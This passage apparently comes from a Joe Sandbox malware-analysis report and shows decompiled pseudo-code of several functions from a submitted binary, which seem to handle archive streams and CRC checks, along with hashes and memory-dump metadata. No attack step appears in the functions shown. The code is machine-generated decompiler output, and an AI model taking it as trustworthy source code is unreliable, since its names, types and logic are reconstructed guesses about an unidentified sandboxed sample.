                              					E004042AD(_t284 - 0x5c);
                              					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0xc));
                              					return _t279;
                              				} else {
                              					goto L1;
                              				}
                              				while(1) {
                              					L1:
                              					 *(_t284 - 0x40) =  *(_t284 - 0x40) & 0x00000000;
                              					 *(_t284 - 0x3c) =  *(_t284 - 0x3c) & 0x00000000;
                              					 *((intOrPtr*)(_t284 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t284 - 0x24)) +  *(_t284 + 0xc) * 4));
                              					 *((intOrPtr*)(_t284 - 0x44)) = 0x41b818;
                              					_push(_t284 - 0x44);
                              					 *(_t284 - 4) = 9;
                              					E0040FA43( *((intOrPtr*)(_t284 + 0x14)));
                              					 *(_t284 - 4) = 8;
                              					 *((intOrPtr*)(_t284 - 0x44)) = 0x41b818;
                              					E00403A9C( *(_t284 - 0x3c));
                              					_t191 =  *((intOrPtr*)(_t284 + 0x14));
                              					_t282 =  *( *((intOrPtr*)(_t191 + 0xc)) +  *(_t191 + 8) * 4 - 4);
                              					 *(_t284 - 0x10) =  *( *((intOrPtr*)(_t191 + 0xc)) +  *(_t191 + 8) * 4 - 4);
                              					 *(_t284 - 0x1c) = E0040C281( *((intOrPtr*)(_t284 + 0x10)));
                              					_t256 =  *(_t284 - 0x1c);
                              					if( *(_t284 - 0x1c) !=  *(_t284 - 0x1c) || 0 != _t271) {
                              						E0040DB47(_t256);
                              					}
                              					E004076D5(_t282,  *(_t284 - 0x1c));
                              					_push(0x14);
                              					_t197 = E00403A76();
                              					_t283 = 0;
                              					if(_t197 != 0) {
                              						 *((intOrPtr*)(_t197 + 4)) = 0;
                              						 *_t197 = 0x41b824;
                              						_t283 = _t197;
                              					}
                              					_t294 = _t283;
                              					 *((intOrPtr*)(_t284 - 0x88)) = _t283;
                              					if(_t283 != 0) {
                              						 *((intOrPtr*)( *_t283 + 4))(_t283);
                              					}
                              					_t271 =  *(_t284 - 0x14);
                              					 *(_t283 + 0x10) =  *(_t283 + 0x10) & 0x00000000;
                              					 *((intOrPtr*)(_t283 + 8)) =  *((intOrPtr*)( *(_t284 - 0x10) + 8));
                              					 *(_t284 - 4) = 0xa;
                              					 *(_t283 + 0xc) =  *(_t284 - 0x1c);
                              					_t202 = E0040AD19(_t284 - 0x164, _t294,  *_t273, _t227,  *((intOrPtr*)(_t284 - 0x34)),  *(_t284 - 0x50) + _t271 * 8,  *((intOrPtr*)(_t284 + 0x10)), _t283, 0); // executed
                              					 *((intOrPtr*)(_t284 - 0x48)) = _t202;
                              					if(_t202 != 0) {
                              						break;
                              					}
                              					if( *((char*)( *((intOrPtr*)(_t284 + 0x10)) + 0x54)) != 0) {
                              						_t271 =  *(_t284 - 0x1c);
                              						_t220 = E004133B0( *((intOrPtr*)( *(_t284 - 0x10) + 8)), _t271);
                              						_t270 =  *((intOrPtr*)(_t284 + 0x10));
                              						if(_t220 !=  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x50))) {
                              							E0040DB47(_t270);
                              						}
                              					}
                              					 *(_t284 - 0x10) =  *(_t284 - 0x10) & 0x00000000;
                              					if( *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x30)) <= 0) {
                              						L14:
                              						 *(_t284 - 4) = 8;
                              						if(_t283 != 0) {
                              							 *((intOrPtr*)( *_t283 + 8))(_t283);
                              						}
                              						 *(_t284 + 0xc) =  *(_t284 + 0xc) + 1;
                              						_t301 =  *(_t284 + 0xc) -  *((intOrPtr*)(_t284 - 0x28));
                              						if( *(_t284 + 0xc) <  *((intOrPtr*)(_t284 - 0x28))) {
                              							continue;
                              						} else {
                              							goto L17;
                              						}
                              					} else {
                              						do {
                              							_t271 =  *(_t284 - 0x50);
                              							 *(_t284 - 0x14) =  *(_t284 - 0x14) + 1;
                              							_t267 =  *((intOrPtr*)(( *(_t284 - 0x14) << 3) + _t271));
                              							_t227 = _t227 + _t267;
                              							asm("adc [ebp-0x34], eax");
                              							 *((intOrPtr*)(_t273 + 0x48)) =  *((intOrPtr*)(_t273 + 0x48)) + _t267;
                              							asm("adc [edi+0x4c], eax");
                              							 *(_t284 - 0x10) =  *(_t284 - 0x10) + 1;
                              						} while ( *(_t284 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x30)));
                              						goto L14;
                              					}
                              				}
                              				__eflags = _t283;
                              				 *(_t284 - 4) = 8;
                              				if(__eflags != 0) {
                              					 *((intOrPtr*)( *_t283 + 8))(_t283);
                              				}
                              				 *(_t284 - 4) = 7;
                              				E0040C380(_t284 - 0x164, __eflags);
                              				 *(_t284 - 4) = 6;
                              				E004042AD(_t284 - 0x70);
                              				 *(_t284 - 4) = 5;
                              				E004042AD(_t284 - 0xb0);
                              				 *(_t284 - 4) = 4;
                              				E004042AD(_t284 - 0x9c);
                              				 *(_t284 - 4) = 3;
                              				E004042AD(_t284 - 0x84);
                              				 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
                              				_t279 =  *((intOrPtr*)(_t284 - 0x48));
                              				 *(_t284 - 4) = 0xb;
                              				goto L18;
                              			}

















                              APIs
                              • __EH_prolog.LIBCMT ref: 0040EA10
                                • Part of subcall function 0040FA43: __EH_prolog.LIBCMT ref: 0040FA48
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 609558a53499a49e72743be03594cb330370f72dde39e5c62d9fac4dd36766c0
                              • Instruction ID: 11288496f406677f7bdfcb919023cacd5b8123072d96ac47e6bfd322b071945c
                              • Opcode Fuzzy Hash: 609558a53499a49e72743be03594cb330370f72dde39e5c62d9fac4dd36766c0
                              • Instruction Fuzzy Hash: 38C14770910269DFDB10DFA5C884BDDBBB4BF14308F1080AEE915B72C2CB786A49CB65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 95%
                              			E0040F648(intOrPtr* __ecx, void* __eflags) {
                              				char* _t92;
                              				signed char _t103;
                              				intOrPtr* _t104;
                              				signed char _t106;
                              				void* _t112;
                              				void* _t116;
                              				signed char _t120;
                              				void* _t124;
                              				signed int _t137;
                              				intOrPtr* _t144;
                              				void* _t145;
                              				void* _t164;
                              				signed char _t168;
                              				intOrPtr _t170;
                              				intOrPtr* _t173;
                              				signed char _t175;
                              				void* _t176;
                              
                              				E00413954(E0041A7FC, _t176);
                              				_t170 =  *((intOrPtr*)(_t176 + 8));
                              				_t173 = __ecx;
                              				E0040D377(_t170);
                              				 *((intOrPtr*)(_t170 + 0x138)) =  *((intOrPtr*)(_t173 + 0x20));
                              				 *((intOrPtr*)(_t170 + 0x13c)) =  *((intOrPtr*)(_t173 + 0x24));
                              				_t92 = _t170 + 0x130;
                              				 *_t92 =  *((intOrPtr*)(_t173 + 0x2e));
                              				_t143 =  *((intOrPtr*)(_t173 + 0x2f));
                              				 *((char*)(_t170 + 0x131)) =  *((intOrPtr*)(_t173 + 0x2f));
                              				if( *_t92 != 0) {
                              					E0040DB47(_t143);
                              				}
                              				_t144 = _t173 + 0x34;
                              				 *((intOrPtr*)(_t176 + 8)) =  *((intOrPtr*)(_t173 + 0x30));
                              				_t137 =  *(_t173 + 0x40);
                              				 *((intOrPtr*)(_t176 - 0x18)) =  *_t144;
                              				 *((intOrPtr*)(_t176 - 0x14)) =  *((intOrPtr*)(_t144 + 4));
                              				 *(_t176 - 0x20) =  *(_t173 + 0x3c);
                              				_t164 = 0x14;
                              				 *((intOrPtr*)(_t176 - 0x10)) =  *((intOrPtr*)(_t173 + 0x44));
                              				if(E004133B0(_t144, _t164) !=  *((intOrPtr*)(_t176 + 8))) {
                              					E0040DB47(_t144);
                              				}
                              				_t145 = 0;
                              				 *((intOrPtr*)(_t170 + 0x140)) =  *((intOrPtr*)(_t173 + 0x20)) + 0x20;
                              				asm("adc edx, ecx");
                              				 *((intOrPtr*)(_t170 + 0x144)) =  *((intOrPtr*)(_t173 + 0x24));
                              				if(( *(_t176 - 0x20) | _t137) != 0) {
                              					__eflags = _t137 - _t145;
                              					if(_t137 > _t145) {
                              						L11:
                              						_t103 = 1;
                              					} else {
                              						__eflags =  *(_t176 - 0x20) - 0xffffffff;
                              						if( *(_t176 - 0x20) > 0xffffffff) {
                              							goto L11;
                              						} else {
                              							__eflags =  *((intOrPtr*)(_t176 - 0x14)) - _t145;
                              							if(__eflags > 0) {
                              								L12:
                              								_t104 =  *_t173;
                              								_t103 =  *((intOrPtr*)( *_t104 + 0x10))(_t104,  *((intOrPtr*)(_t176 - 0x18)),  *((intOrPtr*)(_t176 - 0x14)), 1, _t145);
                              								__eflags = _t103;
                              								if(_t103 == 0) {
                              									 *((intOrPtr*)(_t176 - 0x30)) = 0;
                              									 *((intOrPtr*)(_t176 - 0x2c)) = 0;
                              									 *((intOrPtr*)(_t176 - 0x34)) = 0x41b818;
                              									 *(_t176 - 4) = 0;
                              									E004076D5(_t176 - 0x34,  *(_t176 - 0x20));
                              									_t106 = E0040776F(__eflags,  *(_t176 - 0x20));
                              									__eflags = _t106;
                              									if(_t106 == 0) {
                              										_t168 =  *(_t176 - 0x20);
                              										asm("adc ecx, 0x0");
                              										 *((intOrPtr*)(_t173 + 0x48)) =  *((intOrPtr*)(_t173 + 0x48)) + _t168 + 0x20;
                              										asm("adc [esi+0x4c], ecx");
                              										_t151 =  *((intOrPtr*)(_t176 - 0x2c));
                              										asm("adc ebx, [ebp-0x14]");
                              										 *((intOrPtr*)(_t170 + 0x1c8)) = _t168 +  *((intOrPtr*)(_t176 - 0x18)) + 0x20;
                              										asm("adc ebx, 0x0");
                              										 *(_t170 + 0x1cc) = _t137;
                              										_t112 = E004133B0( *((intOrPtr*)(_t176 - 0x2c)), _t168);
                              										__eflags = _t112 -  *((intOrPtr*)(_t176 - 0x10));
                              										if(_t112 !=  *((intOrPtr*)(_t176 - 0x10))) {
                              											E0040DB47(_t151);
                              										}
                              										 *(_t176 - 0x24) =  *(_t176 - 0x24) & 0x00000000;
                              										 *(_t176 - 4) = 1;
                              										E0040DAE2(_t173, _t176 - 0x34);
                              										E004032A8(_t176 - 0x48, 4);
                              										 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
                              										_t154 =  *((intOrPtr*)(_t173 + 0x18));
                              										 *(_t176 - 4) = 2;
                              										_t116 = E0040DBF4( *((intOrPtr*)(_t173 + 0x18)), _t168);
                              										__eflags = _t116 - 1;
                              										if(_t116 != 1) {
                              											L19:
                              											__eflags = _t116 - 0x17;
                              											if(_t116 != 0x17) {
                              												L21:
                              												E0040DB47(_t154);
                              											} else {
                              												__eflags = _t168;
                              												if(__eflags != 0) {
                              													goto L21;
                              												}
                              											}
                              											_t155 = _t173;
                              											_t120 = E0040EA0B(_t173, _t168, __eflags,  *((intOrPtr*)(_t170 + 0x140)),  *((intOrPtr*)(_t170 + 0x144)), _t170 + 0x150, _t176 - 0x48); // executed
                              											__eflags = _t120;
                              											if(_t120 == 0) {
                              												__eflags =  *(_t176 - 0x40);
                              												if( *(_t176 - 0x40) != 0) {
                              													__eflags =  *(_t176 - 0x40) - 1;
                              													if( *(_t176 - 0x40) > 1) {
                              														E0040DB47(_t155);
                              													}
                              													E0040DA34(_t176 - 0x28);
                              													E0040DAE2(_t173,  *((intOrPtr*)( *((intOrPtr*)(_t176 - 0x3c)))));
                              													_t158 =  *((intOrPtr*)(_t173 + 0x18));
                              													_t124 = E0040DBF4( *((intOrPtr*)(_t173 + 0x18)), _t168);
                              													__eflags = _t124 - 1;
                              													if(_t124 != 1) {
                              														L30:
                              														E0040DB47(_t158);
                              													} else {
                              														__eflags = _t168;
                              														if(_t168 != 0) {
                              															goto L30;
                              														}
                              													}
                              													goto L31;
                              												} else {
                              													 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
                              													 *(_t176 - 4) = 4;
                              													_t175 = 0;
                              												}
                              											} else {
                              												 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
                              												 *(_t176 - 4) = 3;
                              												goto L32;
                              											}
                              										} else {
                              											__eflags = _t168;
                              											if(_t168 == 0) {
                              												L31:
                              												 *((intOrPtr*)(_t170 + 0x1c0)) =  *((intOrPtr*)(_t173 + 0x48));
                              												 *((intOrPtr*)(_t170 + 0x1c4)) =  *((intOrPtr*)(_t173 + 0x4c));
                              												_t120 = E0040ED98(_t173, _t168, _t170);
                              												 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
                              												 *(_t176 - 4) = 5;
                              												L32:
                              												_t175 = _t120;
                              											} else {
                              												goto L19;
                              											}
                              										}
                              										E004042D6();
                              										 *(_t176 - 4) = 1;
                              										E004042AD(_t176 - 0x48);
                              										_t81 = _t176 - 4;
                              										 *_t81 =  *(_t176 - 4) & 0x00000000;
                              										__eflags =  *_t81;
                              										E0040DA34(_t176 - 0x28);
                              									} else {
                              										_t175 = _t106;
                              									}
                              									 *((intOrPtr*)(_t176 - 0x34)) = 0x41b818;
                              									E00403A9C( *((intOrPtr*)(_t176 - 0x2c)));
                              									_t103 = _t175;
                              								}
                              							} else {
                              								if(__eflags < 0) {
                              									goto L11;
                              								} else {
                              									__eflags =  *((intOrPtr*)(_t176 - 0x18)) - _t145;
                              									if( *((intOrPtr*)(_t176 - 0x18)) >= _t145) {
                              										goto L12;
                              									} else {
                              										goto L11;
                              									}
                              								}
                              							}
                              						}
                              					}
                              				} else {
                              					_t103 = 0;
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t176 - 0xc));
                              				return _t103;
                              			}





















                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 56d9e38b1f38824fae3835b0a2d2d95e6ef7d2a708d669e2796a4f5ecf1bfba5
                              • Instruction ID: 8e2da863e0ec0aed1c7df7ef9f788bacddda9dad52c8f94b50dff24b72cd6dff
                              • Opcode Fuzzy Hash: 56d9e38b1f38824fae3835b0a2d2d95e6ef7d2a708d669e2796a4f5ecf1bfba5
                              • Instruction Fuzzy Hash: A7814A71E006059BCB24EBA9C481ADEFBB0BF48304F14453EE445B3791DB38A949CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040C783(void* __ecx) {
                              				intOrPtr _t59;
                              				intOrPtr* _t60;
                              				intOrPtr _t61;
                              				intOrPtr _t64;
                              				intOrPtr* _t66;
                              				intOrPtr _t68;
                              				intOrPtr* _t69;
                              				intOrPtr _t70;
                              				intOrPtr* _t72;
                              				intOrPtr _t83;
                              				signed int _t97;
                              				void* _t100;
                              				intOrPtr* _t101;
                              				intOrPtr _t102;
                              				void* _t104;
                              
                              				E00413954(E0041A330, _t104);
                              				_t100 = __ecx;
                              				_t59 =  *((intOrPtr*)(__ecx + 0x28));
                              				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x18)) + 0xc)) + _t59)) == 0) {
                              					 *(_t104 - 0x10) = 2;
                              				} else {
                              					 *(_t104 - 0x10) = 0 |  *((intOrPtr*)(__ecx + 0x2c)) != 0x00000000;
                              				}
                              				 *((intOrPtr*)(_t104 - 0x14)) = 0;
                              				_t97 =  *((intOrPtr*)(_t100 + 0x24)) + _t59;
                              				_t60 =  *((intOrPtr*)(_t100 + 0x1c));
                              				 *(_t104 - 4) = 0;
                              				_t61 =  *((intOrPtr*)( *_t60 + 0x14))(_t60,  *((intOrPtr*)(_t100 + 0x20)) + _t97, _t104 - 0x14,  *(_t104 - 0x10));
                              				 *((intOrPtr*)(_t104 - 0x18)) = _t61;
                              				if(_t61 == 0) {
                              					E0040640D( *((intOrPtr*)(_t100 + 0xc)) + 8,  *((intOrPtr*)(_t104 - 0x14)));
                              					_t64 =  *((intOrPtr*)(_t100 + 0xc));
                              					 *(_t64 + 0x18) =  *(_t64 + 0x18) | 0xffffffff;
                              					 *((intOrPtr*)(_t64 + 0x10)) = 0;
                              					 *((intOrPtr*)(_t64 + 0x14)) = 0;
                              					 *((char*)(_t64 + 0x1c)) =  *((intOrPtr*)(_t100 + 0x2d));
                              					_t83 =  *((intOrPtr*)(_t100 + 0x14));
                              					 *((char*)(_t100 + 0x2e)) = 1;
                              					_t66 =  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x70)) + _t97 * 4));
                              					 *((intOrPtr*)(_t100 + 0x30)) =  *_t66;
                              					 *((intOrPtr*)(_t100 + 0x34)) =  *((intOrPtr*)(_t66 + 4));
                              					if( *(_t104 - 0x10) == 0 &&  *((intOrPtr*)(_t104 - 0x14)) == 0 && (_t97 >=  *((intOrPtr*)(_t83 + 0x120)) ||  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x124)) + _t97)) == 0) &&  *((intOrPtr*)(_t66 + 0x1d)) == 0) {
                              						 *(_t104 - 0x10) = 2;
                              					}
                              					_t101 =  *((intOrPtr*)(_t100 + 0x1c));
                              					_t68 =  *((intOrPtr*)( *_t101 + 0x18))(_t101,  *(_t104 - 0x10));
                              					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
                              					_t102 = _t68;
                              					_t69 =  *((intOrPtr*)(_t104 - 0x14));
                              					if(_t69 != 0) {
                              						 *((intOrPtr*)( *_t69 + 8))(_t69);
                              					}
                              					_t70 = _t102;
                              				} else {
                              					_t72 =  *((intOrPtr*)(_t104 - 0x14));
                              					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
                              					if(_t72 != 0) {
                              						 *((intOrPtr*)( *_t72 + 8))(_t72);
                              					}
                              					_t70 =  *((intOrPtr*)(_t104 - 0x18));
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0xc));
                              				return _t70;
                              			}



















                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: f15c909000a7bc487a9015a8e9d061d5051666e8d9c8f725cb2d7f58cfb25987
                              • Instruction ID: af1ffdf326ee6b9e8f9f4efb185a7a75328b0af80e7613720a9e9424578e33b6
                              • Opcode Fuzzy Hash: f15c909000a7bc487a9015a8e9d061d5051666e8d9c8f725cb2d7f58cfb25987
                              • Instruction Fuzzy Hash: A9416D71A00646CFCB24DF58C48496ABBF1FF48314B2486AED096AB392C371ED46CF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 95%
                              			E0040D1AB() {
                              				intOrPtr* _t44;
                              				intOrPtr _t50;
                              				void* _t61;
                              				intOrPtr* _t62;
                              				void* _t75;
                              				intOrPtr _t76;
                              				void* _t79;
                              				intOrPtr* _t80;
                              				void* _t82;
                              				void* _t84;
                              
                              				E00413954(E0041A550, _t82);
                              				 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
                              				_t62 =  *((intOrPtr*)(_t82 + 8));
                              				 *((intOrPtr*)(_t82 - 0x10)) = _t84 - 0x58;
                              				 *((intOrPtr*)( *_t62 + 0x10))(_t62, _t75, _t79, _t61);
                              				_t80 =  *((intOrPtr*)(_t82 + 0x14));
                              				 *(_t82 - 4) = 1;
                              				_t87 = _t80;
                              				 *((intOrPtr*)(_t82 - 0x14)) = _t80;
                              				if(_t80 != 0) {
                              					 *((intOrPtr*)( *_t80 + 4))(_t80);
                              				}
                              				 *(_t82 - 0x64) =  *(_t82 - 0x64) & 0x00000000;
                              				 *(_t82 - 4) = 3;
                              				E00402155(_t82 - 0x60);
                              				 *((intOrPtr*)(_t82 - 0x60)) = 0x41b808;
                              				_push( *((intOrPtr*)(_t82 + 0x10)));
                              				 *(_t82 - 4) = 4;
                              				_t76 = E0040DF69(_t82 - 0x64, _t82, _t87,  *((intOrPtr*)(_t82 + 0xc)));
                              				_t88 = _t76;
                              				if(_t76 == 0) {
                              					_t77 = _t62 + 0x10;
                              					_push(_t62 + 0x10); // executed
                              					_t44 = E0040F8C3(_t82 - 0x64, __eflags); // executed
                              					__eflags = _t44;
                              					 *((intOrPtr*)(_t82 + 0x14)) = _t44;
                              					if(__eflags == 0) {
                              						E0040F4D8(_t77);
                              						E0040F51A();
                              						E0040F56F(_t77);
                              						E0040640D(_t62 + 8,  *((intOrPtr*)(_t82 + 0xc)));
                              						 *(_t82 - 4) = 2;
                              						E0040D2CF(_t82 - 0x64, __eflags);
                              						__eflags = _t80;
                              						 *(_t82 - 4) = 1;
                              						if(_t80 != 0) {
                              							 *((intOrPtr*)( *_t80 + 8))(_t80);
                              						}
                              						_t50 = 0;
                              					} else {
                              						 *(_t82 - 4) = 2;
                              						E0040D2CF(_t82 - 0x64, __eflags);
                              						__eflags = _t80;
                              						 *(_t82 - 4) = 1;
                              						if(_t80 != 0) {
                              							 *((intOrPtr*)( *_t80 + 8))(_t80);
                              						}
                              						_t50 =  *((intOrPtr*)(_t82 + 0x14));
                              					}
                              				} else {
                              					 *(_t82 - 4) = 2;
                              					E0040D2CF(_t82 - 0x64, _t88);
                              					 *(_t82 - 4) = 1;
                              					if(_t80 != 0) {
                              						 *((intOrPtr*)( *_t80 + 8))(_t80);
                              					}
                              					_t50 = _t76;
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0xc));
                              				return _t50;
                              			}














                              APIs
                              • __EH_prolog.LIBCMT ref: 0040D1B0
                                • Part of subcall function 0040F8C3: __EH_prolog.LIBCMT ref: 0040F8C8
                                • Part of subcall function 0040D2CF: __EH_prolog.LIBCMT ref: 0040D2D4
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 580a599ea2fd8de7821de45faa8408fd12c279d3f34bd44459390ae0071a66e9
                              • Instruction ID: 9d10d91046bd1a4dd32f0e664b06ea8990f5f8cc09720d5c411fd584516079ca
                              • Opcode Fuzzy Hash: 580a599ea2fd8de7821de45faa8408fd12c279d3f34bd44459390ae0071a66e9
                              • Instruction Fuzzy Hash: 83313031901254DBCB11EFA4C6487EDBBB5AF15304F1440AEE8057B382DB78DE49DBA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E00404C4A(intOrPtr* __ecx, void* __eflags) {
                              				void* _t33;
                              				intOrPtr _t43;
                              				void* _t47;
                              				intOrPtr _t53;
                              				intOrPtr* _t82;
                              				void* _t84;
                              				void* _t86;
                              				intOrPtr _t87;
                              
                              				E00413954(E004195D4, _t84);
                              				_t87 = _t86 - 0x64;
                              				_t82 = __ecx;
                              				E00404D51(_t84 - 0x70);
                              				_t53 = 0;
                              				_push(0x5c);
                              				 *((intOrPtr*)(_t84 - 4)) = 0;
                              				E00405468(_t84 - 0x1c, __ecx);
                              				_push(0x2a);
                              				 *((char*)(_t84 - 4)) = 1;
                              				_t33 = E00405468(_t84 - 0x28, _t84 - 0x1c);
                              				 *(_t84 - 0x38) =  *(_t84 - 0x38) | 0xffffffff;
                              				 *((char*)(_t84 - 4)) = 3;
                              				E00403D24(_t84 - 0x34, _t33);
                              				 *((char*)(_t84 - 4)) = 5;
                              				E00403A9C( *((intOrPtr*)(_t84 - 0x28)));
                              				while(E00405949(_t84 - 0x38, _t84 - 0x70) != 0) {
                              					_t87 = _t87 - 0xc;
                              					 *((intOrPtr*)(_t84 - 0x10)) = _t87;
                              					E00403D24(_t87, _t84 - 0x1c);
                              					_t47 = E00404D6C(_t84 - 0x70); // executed
                              					if(_t47 != _t53) {
                              						continue;
                              					} else {
                              						 *((char*)(_t84 - 4)) = 1;
                              						E00403A9C( *((intOrPtr*)(_t84 - 0x34)));
                              						E0040551A(_t84 - 0x38);
                              						E00403A9C( *((intOrPtr*)(_t84 - 0x1c)));
                              						E00403A9C( *((intOrPtr*)(_t84 - 0x48)));
                              						_t43 = 0;
                              					}
                              					L7:
                              					 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
                              					return _t43;
                              				}
                              				 *((char*)(_t84 - 4)) = 1;
                              				E00403A9C( *((intOrPtr*)(_t84 - 0x34)));
                              				E0040551A(_t84 - 0x38);
                              				if(E0040489C( *_t82, 0) != 0) {
                              					_t53 = E004048AA( *_t82);
                              				}
                              				E00403A9C( *((intOrPtr*)(_t84 - 0x1c)));
                              				E00403A9C( *((intOrPtr*)(_t84 - 0x48)));
                              				_t43 = _t53;
                              				goto L7;
                              			}












                              APIs
                              • __EH_prolog.LIBCMT ref: 00404C4F
                                • Part of subcall function 00405468: __EH_prolog.LIBCMT ref: 0040546D
                                • Part of subcall function 00404D6C: __EH_prolog.LIBCMT ref: 00404D71
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 2d58e100b0e8a5684ba942a8d61a2b33c9f58aa7325c5ec0ae0d3fb5809bcd36
                              • Instruction ID: 9114e62b92f145f299bca9ec68259fa3d4e050d8b6bab90f4208dc7235d8fbe8
                              • Opcode Fuzzy Hash: 2d58e100b0e8a5684ba942a8d61a2b33c9f58aa7325c5ec0ae0d3fb5809bcd36
                              • Instruction Fuzzy Hash: 1A31AF71901209AADF05FFE1E842AEEBF75AF50318F10402FE441332D2CE795A4ADE59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 24%
                              			E00413EA3(unsigned int _a4) {
                              				signed int _v8;
                              				intOrPtr _v20;
                              				void* _v32;
                              				intOrPtr _t19;
                              				void* _t20;
                              				signed char _t22;
                              				void* _t23;
                              				void* _t24;
                              				void* _t36;
                              				unsigned int _t44;
                              				unsigned int _t46;
                              				intOrPtr _t47;
                              				void* _t50;
                              
                              				_push(0xffffffff);
                              				_push(0x41b988);
                              				_push(E00414A2C);
                              				_push( *[fs:0x0]);
                              				 *[fs:0x0] = _t47;
                              				_t19 =  *0x425a38; // 0x1
                              				if(_t19 != 3) {
                              					__eflags = _t19 - 2;
